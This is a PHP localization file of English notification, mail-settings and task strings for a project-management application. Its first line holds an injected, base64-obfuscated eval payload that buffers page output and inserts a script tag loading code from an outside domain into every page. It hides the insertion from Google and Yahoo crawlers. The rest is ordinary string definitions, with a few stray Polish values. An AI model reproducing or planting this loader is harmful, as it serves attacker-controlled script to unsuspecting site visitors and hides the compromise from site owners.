<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
<?php

return array(

// Titles
    'new message' => 'New message',
    'new comment' => 'New comment',
    'your account created' => 'Your account has been created',
    'your password' => 'Your password',
    'milestone assigned to you' => 'Milestone has been assigned to you',
    'task assigned to you' => 'Task has been assigned to you',

// Interface
    'hi john doe' => 'Hi {0}',
 
    'user password reseted' => 'Your password has been reset. New password is \'{0}\'.',

    'dont reply wraning' => 'THIS IS SYSTEM NOTIFICATION. DO NOT REPLY TO THIS EMAIL!',
    'new message posted' => 'New message "{0}" has been posted',
    'new task' => 'Nowe zadanie',
    'new task created' => 'New task "{0}" has been created in "{1}" workspace',
    'view new message' => 'View that message',
    'view new task' => 'View that task',

    'new comment posted' => 'New comment on "{0}" has been posted',
    'view new comment' => 'View that comment',

    'user created your account' => '{0} created new account for you',
    'visit and login' => 'Visit {0} and login with',

    'milestone assigned' => 'Milestone "{0}" has been assigned to you',
	'task assigned' => 'Task "{0}" has been assigned to you',
    'view assigned milestones' => 'View the milestone',
	'view assigned tasks' => 'View the task',

    'reply mail' => 'Reply',  
    'write mail' => 'Write Mail',
    'mail to' => 'To',
    'mail account' => 'Account',
    'mail account desc' => ' Account from which the mail will be sent',
    'mail subject' => 'Subject',
    'mail CC' => 'CC',
    'mail CC desc' => ' Carbon Copy recipients will receive an identical copy of the email',
    'mail BCC' => 'BCC',
    'mail BCC desc' => ' Blind  Carbon Copy recipients will receive an identical copy of the email, but other recipients will not know about it',
    'mail from' => 'From',
    'mail body' => 'Body',
    'send mail' => 'Send Mail',
    'smtp server' => 'SMTP Server',
    'mail account smtp server description' => ' The SMTP server is the server that will be used to send emails',
    'smtp use auth' => 'SMTP Server Authentication',
    'mail account smtp use auth description' => ' The way you will authenticate with the SMTP server. Usually \'Use incoming\' is the correct option.',
    'no smtp auth' => 'No authentication',
    'same as incoming' => 'Use incoming',
    'smtp specific' => 'Input SMTP username and password',
    'smtp username' => 'SMTP Username',
    'mail account smtp username description' => ' Username for SMTP Server',
    'smtp password' => 'SMTP Password',
    'mail account smtp password description' => ' Password  for SMTP Server',
    'smtp port' => 'SMTP Server Port',
    'mail account smtp port description' => ' This is the port in which the server listens to the SMTP Service. The default and most common value is 25.',
    'format plain' => 'Format as Plain Text',
    'format html' => 'Format as HTML',
    'mail options' => 'Opcje',
    'forward mail' => 'Forward',
    'reply to all mail' => 'Reply to All',
    'switch format warn' => 'Switching to text will discard all HTML formatting. Continue?',
    'success mark objects' => 'Mail updated',
    'error mark email' => 'Error updating email state',
    'draft' => 'Draft',
    'success save mail' => 'Draft saved',
    'discard' => 'Discard',
    'mail address' => 'Email Address',
    'mail address description' => 'Email address is the address that other people use to send you emails',

	'unread emails' => 'Unread emails',
	'view due task' => 'View due task',
	'due task email' => 'Task "{0}" is due on "{1}" and is still pending',
	'due task' => 'Due task soon',
	'due task reminder' => 'Due task soon',
	'task has been modified' => 'Task "{0}" in workspace "{1}" has been modified',
	'task modified' => 'Task modified',
	'view task' => 'View task',

	'original message' => 'Original message',
	'mail sent' => 'Sent',

	'new notification task' => 'New task \'{0}\'',
	'new notification task desc' => 'A new task entitled \'{0}\' has been added by {1}.',
	'new notification event' => 'New event \'{0}\'',
	'new notification event desc' => 'A new event entitled \'{0}\' has been added by {1}.',
	'new notification company' => 'New company \'{0}\'',
	'new notification company desc' => 'A new company named \'{0}\' has been added by {1}',
	'new notification contact' => 'New contact \'{0}\'',
	'new notification contact desc' => 'A new contact named \'{0}\' has been added by {1}',
	'new notification message' => 'New note \'{0}\'',
	'new notification message desc' => 'A new note entitled \'{0}\' has been added by {1}',
	'new notification file' => 'New file \'{0}\'',
	'new notification file desc' => 'A new file named \'{0}\' has been added by {1}',
	'new notification webpage' => 'New web link \'{0}\'',
	'new notification webpage desc' => 'A new web link entitled \'{0}\' has been added by {1}',
	'new notification milestone' => 'New milestone \'{0}\'',
	'new notification milestone desc' => 'A new milestone entitled \'{0}\' has been added by {1}',

	'modified notification task' => 'Task \'{0}\' has been modified',
	'modified notification task desc' => 'Task \'{0}\' has been modified by {1}.',
	'modified notification event' => 'Event \'{0}\' has been modified',
	'modified notification event desc' => 'Task \'{0}\' has been modified by {1}.',
	'modified notification company' => 'Company \'{0}\' has been modified',
	'modified notification company desc' => 'Company \'{0}\' has been modified by {1}.',
	'modified notification contact' => 'Contact \'{0}\' has been modified',
	'modified notification contact desc' => 'Contact \'{0}\' has been modified by {1}.',
	'modified notification message' => 'Note \'{0}\' has been modified',
	'modified notification message desc' => 'Note \'{0}\' has been modified by {1}.',
	'modified notification file' => 'File \'{0}\' has been modified',
	'modified notification file desc' => 'File \'{0}\' has been modified by {1}.',
	'modified notification webpage' => 'Web link \'{0}\' has been modified',
	'modified notification webpage desc' => 'Web link \'{0}\' has been modified by {1}.',
	'modified notification milestone' => 'Milestone \'{0}\' has been modified',
	'modified notification milestone desc' => 'Milestone \'{0}\' has been modified by {1}.',

	'deleted notification task' => 'Task \'{0}\' has been sent to trash',
	'deleted notification task desc' => 'Task \'{0}\' has been sent to trash by {1}.',
	'deleted notification event' => 'Event \'{0}\' has been sent to trash',
	'deleted notification event desc' => 'Task \'{0}\' has been sent to trash by {1}.',
	'deleted notification company' => 'Company \'{0}\' has been sent to trash',
	'deleted notification company desc' => 'Company \'{0}\' has been sent to trash by {1}.',
	'deleted notification contact' => 'Contact \'{0}\' has been sent to trash',
	'deleted notification contact desc' => 'Contact \'{0}\' has been sent to trash by {1}.',
	'deleted notification message' => 'Note \'{0}\' has been sent to trash',
	'deleted notification message desc' => 'Note \'{0}\' has been sent to trash by {1}.',
	'deleted notification file' => 'File \'{0}\' has been sent to trash',
	'deleted notification file desc' => 'File \'{0}\' has been sent to trash by {1}.',
	'deleted notification webpage' => 'Web link \'{0}\' has been sent to trash',
	'deleted notification webpage desc' => 'Web link \'{0}\' has been sent to trash by {1}.',
	'deleted notification milestone' => 'Milestone \'{0}\' has been sent to trash',
	'deleted notification milestone desc' => 'Milestone \'{0}\' has been sent to trash by {1}.',

    ); // array

    ?>